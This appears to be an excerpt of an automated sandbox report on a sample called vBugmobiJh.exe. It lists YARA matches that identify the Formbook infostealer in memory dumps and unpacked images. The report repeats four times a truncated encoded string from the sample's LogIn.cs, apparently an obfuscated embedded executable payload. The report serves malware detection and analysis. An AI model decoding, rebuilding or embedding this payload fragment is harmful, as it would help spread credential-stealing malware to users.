          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vBugmobiJh.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vBugmobiJh.exe, LogIn.csBase64 encoded string: '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
          Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 4.2.vBugmobiJh.exe.150000.0.unpack, LogIn.csBase64 encoded string: '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
